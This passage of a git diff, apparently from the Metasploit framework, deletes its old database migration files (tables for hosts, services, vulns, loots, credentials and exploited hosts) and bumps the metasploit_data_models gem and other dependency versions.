data/sql/migrate/011_add_reports.rb delete mode 100755 data/sql/migrate/012_add_tasks.rb delete mode 100755 data/sql/migrate/013_add_tasks_result.rb delete mode 100755 data/sql/migrate/014_add_loots_fields.rb delete mode 100755 data/sql/migrate/015_rename_user.rb delete mode 100755 data/sql/migrate/016_add_host_purpose.rb delete mode 100755 data/sql/migrate/017_expand_info2.rb delete mode 100755 data/sql/migrate/018_add_workspace_user_info.rb delete mode 100755 data/sql/migrate/019_add_workspace_desc.rb delete mode 100755 data/sql/migrate/020_add_user_preferences.rb delete mode 100755 data/sql/migrate/021_standardize_info_and_data.rb delete mode 100755 data/sql/migrate/022_enlarge_event_info.rb delete mode 100755 data/sql/migrate/023_add_report_downloaded_at.rb delete mode 100755 data/sql/migrate/024_convert_service_info_to_text.rb delete mode 100755 data/sql/migrate/025_add_user_admin.rb delete mode 100755 data/sql/migrate/026_add_creds_table.rb delete mode 100755 data/sql/migrate/20100819123300_migrate_cred_data.rb delete mode 100755 data/sql/migrate/20100824151500_add_exploited_table.rb delete mode 100755 data/sql/migrate/20100908001428_add_owner_to_workspaces.rb delete mode 100755 data/sql/migrate/20100911122000_add_report_templates.rb delete mode 100755 data/sql/migrate/20100916151530_require_admin_flag.rb delete mode 100755 data/sql/migrate/20100916175000_add_campaigns_and_templates.rb delete mode 100755 data/sql/migrate/20100920012100_add_generate_exe_column.rb delete mode 100755 data/sql/migrate/20100926214000_add_template_prefs.rb delete mode 100755 data/sql/migrate/20101001000000_add_web_tables.rb delete mode 100755 data/sql/migrate/20101002000000_add_query.rb delete mode 100755 data/sql/migrate/20101007000000_add_vuln_info.rb delete mode 100755 data/sql/migrate/20101008111800_add_clients_to_campaigns.rb delete mode 100755 data/sql/migrate/20101009023300_add_campaign_attachments.rb delete mode 100755 data/sql/migrate/20101104135100_add_imported_creds.rb 
delete mode 100755 data/sql/migrate/20101203000000_fix_web_tables.rb delete mode 100755 data/sql/migrate/20101203000001_expand_host_comment.rb delete mode 100755 data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb delete mode 100755 data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb delete mode 100755 data/sql/migrate/20110204112800_add_host_tags.rb delete mode 100755 data/sql/migrate/20110317144932_add_session_table.rb delete mode 100755 data/sql/migrate/20110414180600_add_local_id_to_session_table.rb delete mode 100755 data/sql/migrate/20110415175705_add_routes_table.rb delete mode 100755 data/sql/migrate/20110422000000_convert_binary.rb delete mode 100755 data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb delete mode 100755 data/sql/migrate/20110513143900_track_successful_exploits.rb delete mode 100755 data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb delete mode 100755 data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb delete mode 100755 data/sql/migrate/20110527000001_add_api_keys_table.rb delete mode 100755 data/sql/migrate/20110606000001_add_macros_table.rb delete mode 100755 data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb delete mode 100755 data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb delete mode 100755 data/sql/migrate/20110624000001_add_listeners_table.rb delete mode 100755 data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb delete mode 100755 data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110717000001_add_profiles_table.rb delete mode 100755 data/sql/migrate/20110727163801_expand_cred_ptype_column.rb delete mode 100755 data/sql/migrate/20110730000001_add_initial_indexes.rb delete mode 100755 data/sql/migrate/20110812000001_prune_indexes.rb delete mode 100755 
data/sql/migrate/20110922000000_expand_notes.rb delete mode 100755 data/sql/migrate/20110928101300_add_mod_ref_table.rb delete mode 100755 data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb delete mode 100755 data/sql/migrate/20111203000000_inet_columns.rb delete mode 100755 data/sql/migrate/20111204000000_more_inet_columns.rb delete mode 100755 data/sql/migrate/20111210000000_add_scope_to_hosts.rb delete mode 100755 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb delete mode 100755 data/sql/migrate/20120411173220_rename_workspace_members.rb delete mode 100755 data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb delete mode 100755 data/sql/migrate/20120625000000_add_vuln_details.rb delete mode 100755 data/sql/migrate/20120625000001_add_host_details.rb delete mode 100755 data/sql/migrate/20120625000002_expand_details.rb delete mode 100755 data/sql/migrate/20120625000003_expand_details2.rb delete mode 100755 data/sql/migrate/20120625000004_add_vuln_attempts.rb delete mode 100755 data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb delete mode 100755 data/sql/migrate/20120625000006_add_module_details.rb delete mode 100755 data/sql/migrate/20120625000007_add_exploit_attempts.rb delete mode 100755 data/sql/migrate/20120625000008_add_fail_message.rb delete mode 100644 data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb diff --git a/Gemfile b/Gemfile index 3d5f14fe4c..9513b0a497 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler 
diff --git a/Gemfile.lock b/Gemfile.lock index c50df873bf..6ac57f60f6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 448c1065329efea1eac76a3897f626f122666743 - tag: 0.4.0 + revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + tag: 0.5.1 specs: - metasploit_data_models (0.4.0) + metasploit_data_models (0.5.1) activerecord (>= 3.2.10) activesupport pg @@ -25,7 +25,7 @@ GEM multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) - coderay (1.0.8) + coderay (1.0.9) diff-lcs (1.1.3) i18n (0.6.1) json (1.7.7) @@ -35,10 +35,10 @@ GEM nokogiri (1.5.6) pcaprub (0.11.3) pg (0.14.1) - pry (0.9.10) + pry (0.9.12) coderay (~> 1.0.5) method_source (~> 0.8) - slop (~> 3.3.1) + slop (~> 3.4) rake (10.0.2) redcarpet (2.2.2) robots (0.10.1) @@ -54,7 +54,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) - slop (3.3.3) + slop (3.4.3) tzinfo (0.3.35) yard (0.8.3) diff --git a/data/sql/migrate/000_create_tables.rb b/data/sql/migrate/000_create_tables.rb deleted file mode 100755 index efda742476..0000000000 --- a/data/sql/migrate/000_create_tables.rb +++ /dev/null 
@@ -1,79 +0,0 @@ -class CreateTables < ActiveRecord::Migration - - def self.up - - create_table :hosts do |t| - t.timestamp :created - t.string :address, :limit => 16 # unique - t.string :address6 - t.string :mac - t.string :comm - t.string :name - t.string :state - t.string :info, :limit => 1024 - t.string :os_name - t.string :os_flavor - t.string :os_sp - t.string :os_lang - t.string :arch - end - - add_index :hosts, :address, :unique => true - - create_table :clients do |t| - t.integer :host_id - t.timestamp :created - t.string :ua_string, :limit => 1024, :null => false - t.string :ua_name, :limit => 64 - t.string :ua_ver, :limit => 32 - end - - create_table :services do |t| - t.integer :host_id - t.timestamp :created - t.integer :port, :null => false - t.string :proto, :limit => 16, :null => false - t.string :state - t.string :name - t.string :info, :limit => 1024 - end - - create_table :vulns do |t| - t.integer :host_id - t.integer :service_id - t.timestamp :created - t.string :name - t.text :data - end - - create_table :refs do |t| - t.integer :ref_id - t.timestamp :created - t.string :name, :limit => 512 - end - - create_table :vulns_refs, :id => false do |t| - t.integer :ref_id - t.integer :vuln_id - end - - create_table :notes do |t| - t.integer :host_id - t.timestamp :created - t.string :ntype, :limit => 512 - t.text :data - end - - end - - def self.down - drop_table :hosts - drop_table :clients - drop_table :services - drop_table :vulns - drop_table :refs - drop_table :vulns_refs - drop_table :notes - end - -end diff --git a/data/sql/migrate/001_add_wmap_tables.rb b/data/sql/migrate/001_add_wmap_tables.rb deleted file mode 100755 index e0d37098c2..0000000000 --- a/data/sql/migrate/001_add_wmap_tables.rb +++ /dev/null 
@@ -1,35 +0,0 @@ -class AddWmapTables < ActiveRecord::Migration - def self.up - create_table :wmap_targets do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.integer :selected - end - - create_table :wmap_requests do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.string :meth, :limit => 32 - t.text :path - t.text :headers - t.text :query - t.text :body - t.string :respcode, :limit => 16 - t.text :resphead - t.text :response - t.timestamp :created - end - end - - def self.down - drop_table :wmap_targets - drop_table :wmap_requests - end -end - diff --git a/data/sql/migrate/002_add_workspaces.rb b/data/sql/migrate/002_add_workspaces.rb deleted file mode 100755 index 9afe792ef5..0000000000 --- a/data/sql/migrate/002_add_workspaces.rb +++ /dev/null @@ -1,36 +0,0 @@ -class AddWorkspaces < ActiveRecord::Migration - - def self.up - create_table :workspaces do |t| - t.string :name - t.timestamps - end - - change_table :hosts do |t| - t.integer :workspace_id, :required => true - end - - remove_index :hosts, :column => :address - - # - # This was broken after 018_add_workspace_user_info was introduced - # because of the new boundary column. For some reason, the - # find_or_create_by_name that .default eventually calls here tries to - # create a record with the boundary field that doesn't exist yet. - # See #1724 - # - #w = Msf::DBManager::Workspace.default - #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id] - end - - def self.down - drop_table :workspaces - - change_table :hosts do |t| - t.remove :workspace_id - end - - add_index :hosts, :address, :unique => true - end - -end diff --git a/data/sql/migrate/003_move_notes.rb b/data/sql/migrate/003_move_notes.rb deleted file mode 100755 index 3aedba8e20..0000000000 --- a/data/sql/migrate/003_move_notes.rb +++ /dev/null 
@@ -1,20 +0,0 @@ -class MoveNotes < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :notes, :host_id - change_table :notes do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :service_id - t.integer :host_id - end - end - - def self.down - remove_column :notes, :workspace_id - remove_column :notes, :service_id - change_table :notes do |t| - t.integer :host_id, :null => false - end - end -end - diff --git a/data/sql/migrate/004_add_events_table.rb b/data/sql/migrate/004_add_events_table.rb deleted file mode 100755 index a89d75281e..0000000000 --- a/data/sql/migrate/004_add_events_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddEventsTable < ActiveRecord::Migration - def self.up - create_table :events do |t| - t.integer :workspace_id - t.integer :host_id - t.timestamp :created_at - t.string :user - t.string :name - t.string :info - end - end - def self.down - drop_table :events - end -end - diff --git a/data/sql/migrate/005_expand_info.rb b/data/sql/migrate/005_expand_info.rb deleted file mode 100755 index bd34021e11..0000000000 --- a/data/sql/migrate/005_expand_info.rb +++ /dev/null 
@@ -1,58 +0,0 @@ -class ExpandInfo < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 4096 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 1024 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 1024 - end - - remove_column :vulns, :data - change_table :hosts do |t| - t.string :data, :limit => 1024 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 1024 - end - - end -end - diff --git a/data/sql/migrate/006_add_timestamps.rb b/data/sql/migrate/006_add_timestamps.rb deleted file mode 100755 index 446a83aa29..0000000000 --- a/data/sql/migrate/006_add_timestamps.rb +++ /dev/null 
@@ -1,26 +0,0 @@ - -# Adds 'created_at' and 'updated_at' columns to every primary table. -# -class AddTimestamps < ActiveRecord::Migration - - @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests] - @@TABLES_NEEDING_CREATED_AT = [:wmap_targets] - @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets] - - def self.up - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at } - - @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime } - end - - def self.down - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created } - - @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at } - end -end - diff --git a/data/sql/migrate/007_add_loots.rb b/data/sql/migrate/007_add_loots.rb deleted file mode 100755 index 32786f8cfb..0000000000 --- a/data/sql/migrate/007_add_loots.rb +++ /dev/null @@ -1,20 +0,0 @@ -class AddLoots < ActiveRecord::Migration - - def self.up - create_table :loots do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :host_id - t.integer :service_id - t.string :ltype, :limit => 512 - t.string :path, :limit => 1024 - t.text :data - t.timestamps - end - end - - def self.down - drop_table :loots - end - -end - diff --git a/data/sql/migrate/008_create_users.rb b/data/sql/migrate/008_create_users.rb deleted file mode 100755 index 4cc32cc6e4..0000000000 --- a/data/sql/migrate/008_create_users.rb +++ /dev/null @@ -1,16 +0,0 @@ -class CreateUsers < ActiveRecord::Migration - def self.up - create_table :users do |t| - t.string :username - t.string :crypted_password - t.string :password_salt - t.string :persistence_token - - t.timestamps - end - end - - def self.down - drop_table :users - end -end 
diff --git a/data/sql/migrate/009_add_loots_ctype.rb b/data/sql/migrate/009_add_loots_ctype.rb deleted file mode 100755 index 0aad1366fb..0000000000 --- a/data/sql/migrate/009_add_loots_ctype.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddLootsCtype < ActiveRecord::Migration - def self.up - add_column :loots, :content_type, :string - end - - def self.down - remove_column :loots, :content_type - end -end - diff --git a/data/sql/migrate/010_add_alert_fields.rb b/data/sql/migrate/010_add_alert_fields.rb deleted file mode 100755 index f99dd68d32..0000000000 --- a/data/sql/migrate/010_add_alert_fields.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddAlertFields < ActiveRecord::Migration - def self.up - add_column :notes, :critical, :boolean - add_column :notes, :seen, :boolean - add_column :events, :critical, :boolean - add_column :events, :seen, :boolean - end - - def self.down - remove_column :notes, :critical - remove_column :notes, :seen - remove_column :events, :critical - remove_column :events, :seen - end -end - diff --git a/data/sql/migrate/011_add_reports.rb b/data/sql/migrate/011_add_reports.rb deleted file mode 100755 index 2f16e8b70d..0000000000 --- a/data/sql/migrate/011_add_reports.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddReports < ActiveRecord::Migration - - def self.up - create_table :reports do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :rtype - t.string :path, :limit => 1024 - t.text :options - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/012_add_tasks.rb b/data/sql/migrate/012_add_tasks.rb deleted file mode 100755 index 39004c821e..0000000000 --- a/data/sql/migrate/012_add_tasks.rb +++ /dev/null 
@@ -1,24 +0,0 @@ -class AddTasks < ActiveRecord::Migration - - def self.up - create_table :tasks do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :module - t.datetime :completed_at - t.string :path, :limit => 1024 - t.string :info - t.string :description - t.integer :progress - t.text :options - t.text :error - t.timestamps - end - end - - def self.down - drop_table :tasks - end - -end - diff --git a/data/sql/migrate/013_add_tasks_result.rb b/data/sql/migrate/013_add_tasks_result.rb deleted file mode 100755 index bf01c7afb8..0000000000 --- a/data/sql/migrate/013_add_tasks_result.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddTasksResult < ActiveRecord::Migration - def self.up - add_column :tasks, :result, :text - end - - def self.down - remove_column :tasks, :result - end -end - diff --git a/data/sql/migrate/014_add_loots_fields.rb b/data/sql/migrate/014_add_loots_fields.rb deleted file mode 100755 index 616d8c96be..0000000000 --- a/data/sql/migrate/014_add_loots_fields.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddLootsFields < ActiveRecord::Migration - def self.up - add_column :loots, :name, :text - add_column :loots, :info, :text - end - - def self.down - remove_column :loots, :name - remove_column :loots, :info - end -end - diff --git a/data/sql/migrate/015_rename_user.rb b/data/sql/migrate/015_rename_user.rb deleted file mode 100755 index 7934a0f423..0000000000 --- a/data/sql/migrate/015_rename_user.rb +++ /dev/null @@ -1,16 +0,0 @@ -class RenameUser < ActiveRecord::Migration - def self.up - remove_column :events, :user - change_table :events do |t| - t.string :username - end - end - - def self.down - remove_column :events, :username - change_table :events do |t| - t.string :user - end - end -end - diff --git a/data/sql/migrate/016_add_host_purpose.rb b/data/sql/migrate/016_add_host_purpose.rb deleted file mode 100755 index 1e2827801e..0000000000 --- a/data/sql/migrate/016_add_host_purpose.rb +++ /dev/null 
@@ -1,10 +0,0 @@ -class AddHostPurpose < ActiveRecord::Migration - def self.up - add_column :hosts, :purpose, :text - end - - def self.down - remove_column :hosts, :purpose - end -end - diff --git a/data/sql/migrate/017_expand_info2.rb b/data/sql/migrate/017_expand_info2.rb deleted file mode 100755 index cee6fd8d3b..0000000000 --- a/data/sql/migrate/017_expand_info2.rb +++ /dev/null @@ -1,58 +0,0 @@ -class ExpandInfo2 < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 65536 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 65536 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 65536 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 65536 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - - end -end - diff --git a/data/sql/migrate/018_add_workspace_user_info.rb b/data/sql/migrate/018_add_workspace_user_info.rb deleted file mode 100755 index fb5e101fc3..0000000000 --- a/data/sql/migrate/018_add_workspace_user_info.rb +++ /dev/null 
@@ -1,29 +0,0 @@ -class AddWorkspaceUserInfo < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :boundary, :limit => 4096 - end - - change_table :users do |t| - t.string :fullname - t.string :email - t.string :phone - t.string :company - end - end - - def self.down - change_table :workspaces do |t| - t.remove :boundary - end - - change_table :users do |t| - t.remove :fullname - t.remove :email - t.remove :phone - t.remove :company - end - end - -end - diff --git a/data/sql/migrate/019_add_workspace_desc.rb b/data/sql/migrate/019_add_workspace_desc.rb deleted file mode 100755 index 0dc31f0c61..0000000000 --- a/data/sql/migrate/019_add_workspace_desc.rb +++ /dev/null @@ -1,23 +0,0 @@ -class AddWorkspaceDesc < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :description, :limit => 4096 - end - - change_table :hosts do |t| - t.string :comments, :limit => 4096 - end - end - - def self.down - change_table :workspaces do |t| - t.remove :description - end - - change_table :hosts do |t| - t.remove :comments - end - end - -end - diff --git a/data/sql/migrate/020_add_user_preferences.rb b/data/sql/migrate/020_add_user_preferences.rb deleted file mode 100755 index 40b472701c..0000000000 --- a/data/sql/migrate/020_add_user_preferences.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddUserPreferences < ActiveRecord::Migration - def self.up - add_column :users, :prefs, :string, :limit => 524288 - end - - def self.down - remove_column :users, :prefs - end - -end - diff --git a/data/sql/migrate/021_standardize_info_and_data.rb b/data/sql/migrate/021_standardize_info_and_data.rb deleted file mode 100755 index bb9a2bccd6..0000000000 --- a/data/sql/migrate/021_standardize_info_and_data.rb +++ /dev/null 
@@ -1,18 +0,0 @@ -class StandardizeInfoAndData < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :vulns, :data - change_table :vulns do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - remove_column :vulns, :info - change_table :notes do |t| - t.string :data, :limit => 65536 - - end - end -end - diff --git a/data/sql/migrate/022_enlarge_event_info.rb b/data/sql/migrate/022_enlarge_event_info.rb deleted file mode 100755 index fec9698c06..0000000000 --- a/data/sql/migrate/022_enlarge_event_info.rb +++ /dev/null @@ -1,10 +0,0 @@ -class EnlargeEventInfo < ActiveRecord::Migration - def self.up - change_column :events, :info, :text - end - - def self.down - change_column :events, :info, :string, :limit => 65535 - end -end - diff --git a/data/sql/migrate/023_add_report_downloaded_at.rb b/data/sql/migrate/023_add_report_downloaded_at.rb deleted file mode 100755 index 7ec5716e82..0000000000 --- a/data/sql/migrate/023_add_report_downloaded_at.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddReportDownloadedAt < ActiveRecord::Migration - def self.up - add_column :reports, :downloaded_at, :timestamp - end - - def self.down - remove_column :reports, :downloaded_at - end -end - diff --git a/data/sql/migrate/024_convert_service_info_to_text.rb b/data/sql/migrate/024_convert_service_info_to_text.rb deleted file mode 100755 index 14f0a96222..0000000000 --- a/data/sql/migrate/024_convert_service_info_to_text.rb +++ /dev/null @@ -1,12 +0,0 @@ -class ConvertServiceInfoToText < ActiveRecord::Migration - - def self.up - change_column :services, :info, :text - end - - def self.down - change_column :services, :info, :string, :limit => 65536 - end - -end - diff --git a/data/sql/migrate/025_add_user_admin.rb b/data/sql/migrate/025_add_user_admin.rb deleted file mode 100755 index d077dbd633..0000000000 --- a/data/sql/migrate/025_add_user_admin.rb +++ /dev/null 
@@ -1,19 +0,0 @@ -class AddUserAdmin < ActiveRecord::Migration - - # Add user admin flag and project member list. - def self.up - add_column :users, :admin, :boolean, :default => true - - create_table :project_members, :id => false do |t| - t.integer :workspace_id, :null => false - t.integer :user_id, :null => false - end - end - - def self.down - remove_column :users, :admin - - drop_table :project_members - end -end - diff --git a/data/sql/migrate/026_add_creds_table.rb b/data/sql/migrate/026_add_creds_table.rb deleted file mode 100755 index 381ec8373a..0000000000 --- a/data/sql/migrate/026_add_creds_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddCredsTable < ActiveRecord::Migration - def self.up - create_table :creds do |t| - t.integer :service_id, :null => false - t.timestamps - t.string :user, :limit => 2048 - t.string :pass, :limit => 4096 - t.boolean :active, :default => true - t.string :proof, :limit => 4096 - t.string :ptype, :limit => 16 - t.integer :source_id - t.string :source_type - end - end - def self.down - drop_table :creds - end -end - diff --git a/data/sql/migrate/20100819123300_migrate_cred_data.rb b/data/sql/migrate/20100819123300_migrate_cred_data.rb deleted file mode 100755 index d752c270f4..0000000000 --- a/data/sql/migrate/20100819123300_migrate_cred_data.rb +++ /dev/null 
@@ -1,154 +0,0 @@ -class MigrateCredData < ActiveRecord::Migration - - def self.up - begin # Wrap the whole thing in a giant rescue. - skipped_notes = [] - new_creds = [] - Mdm::Note.find(:all).each do |note| - next unless note.ntype[/^auth\.(.*)/] - service_name = $1 - if !service_name - skipped_notes << note - next - end - if note.host and note.host.respond_to?(:address) - if note.service - svc_id = note.service.id - else - candidate_services = [] - note.host.services.each do |service| - if service.name == service_name - candidate_services << service - end - end - # Use the default port, or the first port that matches the protocol name. - default_port = case service_name.downcase - when 'ftp'; 21 - when /^smb/; 445 - when /^imap/; 143 - when 'telnet'; 23 - when 'pop3'; 110 - when 'http','domino','axis','wordpress','tomcat'; 80 - when 'tns'; 1521 - when 'snmp'; 161 - when 'mssql'; 1433 - when 'ssh'; 22 - when 'https'; 443 - when 'mysql'; 3306 - when 'db2'; 50000 - when 'postgres'; 5432 - else nil - end - if !default_port - skipped_notes << note - next - end - if candidate_services.size == 1 - svc_id = candidate_services.first.id - elsif candidate_services.empty? - Mdm::Service.new do |svc| - svc.host_id = note.host.id - svc.port = default_port - svc.proto = 'tcp' - svc.state = 'open' - svc.name = service_name.downcase - svc.save! - svc_id = svc.id - end - elsif candidate_services.size > 1 - svc_ports = candidate_services.map{|s| s.port} - if svc_ports.index(default_port) - svc_id = candidate_services[svc_ports.index(default_port)].id - else - svc_id = candidate_services.first.id - end - end - end - else - skipped_notes << note - next - end - if note.data[:hash] - ptype = 'smb_hash' - pass = note.data[:hash] - elsif note.data[:ssh_key] - ptype = 'ssh_key' - pass = note.data[:extra] - else - ptype = 'password' - pass = note.data[:pass] - end - # Format domains and databases into the usernames. 
- if note.ntype == "auth.smb_challenge" - domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1] - if domain - user = [domain, note.data[:user]].join("/") - else - user = note.data[:user] - end - elsif note.ntype =~ /auth\.(postgres|db2)/ - if note.data[:database] - user = [note.data[:database], note.data[:user]].join("/") - else - user = note.data[:user] - end - else - user = note.data[:user] - end - # Not actually a credentials, convert to migrated notes - if service_name == 'smb' && note.data[:token] - skipped_notes << note - next - end - if service_name == 'tns' && note.data[:type] == "bruteforced_sid" - skipped_notes << note - next - end - # Special case for the bizarre reporting for aux/admin/oracle/oracle_login - if service_name == 'tns' && note.data[:type] == "bruteforced_account" - note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/ - user = "#{$3}/#{$1}" - pass = $2 - end - new_creds << [svc_id, ptype, user, pass] - end - - say "Migrating #{new_creds.size} credentials." - new_creds.uniq.each do |note| - Mdm::Cred.new do |cred| - cred.service_id = note[0] - cred.user = note[2] - cred.pass = note[3] - cred.ptype = note[1] - cred.save! - end - end - - say "Migrating #{skipped_notes.size} notes." - skipped_notes.uniq.each do |note| - Mdm::Note.new do |new_note| - new_note.host_id = note.host_id - new_note.ntype = "migrated_auth" - new_note.data = note.data.merge(:migrated_auth_type => note.ntype) - new_note.save! - end - end - - say "Deleting migrated auth notes." - Mdm::Note.find(:all).each do |note| - next unless note.ntype[/^auth\.(.*)/] - note.delete - end - rescue - say "There was a problem migrating auth credentials. Skipping." - return true # Never fail! - end - end - - - def self.down - raise ActiveRecord::IrreversibleMigration - end - -end - diff --git a/data/sql/migrate/20100824151500_add_exploited_table.rb b/data/sql/migrate/20100824151500_add_exploited_table.rb deleted file mode 100755 index b7897d3832..0000000000 
--- a/data/sql/migrate/20100824151500_add_exploited_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddExploitedTable < ActiveRecord::Migration - def self.up - create_table :exploited_hosts do |t| - t.integer :host_id, :null => false - t.integer :service_id - t.string :session_uuid, :limit => 8 - t.string :name, :limit => 2048 - t.string :payload, :limit => 2048 - t.timestamps - end - end - def self.down - drop_table :exploited_hosts - end -end - diff --git a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb b/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb deleted file mode 100755 index c136d4b9d7..0000000000 --- a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddOwnerToWorkspaces < ActiveRecord::Migration - def self.up - add_column :workspaces, :owner_id, :integer - end - - def self.down - remove_column :workspaces, :owner_id - end -end diff --git a/data/sql/migrate/20100911122000_add_report_templates.rb b/data/sql/migrate/20100911122000_add_report_templates.rb deleted file mode 100755 index 08b06d4c5f..0000000000 --- a/data/sql/migrate/20100911122000_add_report_templates.rb +++ /dev/null @@ -1,18 +0,0 @@ -class AddReportTemplates < ActiveRecord::Migration - - def self.up - create_table :report_templates do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :path, :limit => 1024 - t.text :name - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/20100916151530_require_admin_flag.rb b/data/sql/migrate/20100916151530_require_admin_flag.rb deleted file mode 100755 index d73e18425d..0000000000 --- a/data/sql/migrate/20100916151530_require_admin_flag.rb +++ /dev/null 
@@ -1,15 +0,0 @@ -class RequireAdminFlag < ActiveRecord::Migration - - # Make the admin flag required. - def self.up - # update any existing records - Mdm::User.update_all({:admin => true}, {:admin => nil}) - - change_column :users, :admin, :boolean, :null => false, :default => true - end - - def self.down - change_column :users, :admin, :boolean, :default => true - end - -end diff --git a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb b/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb deleted file mode 100755 index 433bdcf65f..0000000000 --- a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb +++ /dev/null 
